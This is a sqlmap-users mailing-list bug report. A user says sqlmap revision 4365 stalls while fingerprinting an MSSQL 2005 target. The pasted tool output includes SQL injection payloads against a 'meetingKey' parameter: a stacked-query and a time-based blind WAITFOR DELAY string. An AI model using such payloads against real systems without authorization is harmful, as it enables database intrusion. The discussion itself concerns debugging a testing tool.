Hi there,
I just updated to the last revision (4365) and tried to attack a Microsoft SQL
Server 2005 via AND/OR time-based blind or MS stacked queries.
The module which analysed which dba is there gets stuck with MSSQL (if I force
--dbms=mssql). Otherwise it finds a Postgres-DB (which obviously can't be
because of the attack vector). I think there
might be something broken.
I reverted to #4233 which is working and correctly detects MSSQL.
Greetings,
Christian
----snip----
GET parameter 'meetingKey' is vulnerable. Do you want to keep testing the
others? [y/N]
sqlmap identified the following injection points with a total of 47 HTTP(s)
requests:
---
Place: GET
Parameter: meetingKey
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: passcode=&meetingKey='; WAITFOR DELAY '0:0:5';-- AND 'yUTW'='yUTW
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: passcode=&meetingKey=' WAITFOR DELAY '0:0:5'-- AND 'PowX'='PowX
---
[17:33:51] [INFO] testing Microsoft SQL Server
[17:33:51] [WARNING] it is very important not to stress the network adapter's
bandwidth during usage of time-based queries
[17:34:12] [INFO] confirming Microsoft SQL Server
<stuck here, Wireshark shows useless attack vectors (just the Waitfor Delay)>
----snip----
------------------------------------------------------------------------------
Doing More with Less: The Next Generation Virtual Desktop
What are the key obstacles that have prevented many mid-market businesses
from deploying virtual desktops? How do next-generation virtual desktops
provide companies an easier-to-deploy, easier-to-manage and more affordable
virtual desktop model.http://www.accelacomm.com/jaw/sfnl/114/51426474/
_______________________________________________
sqlmap-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
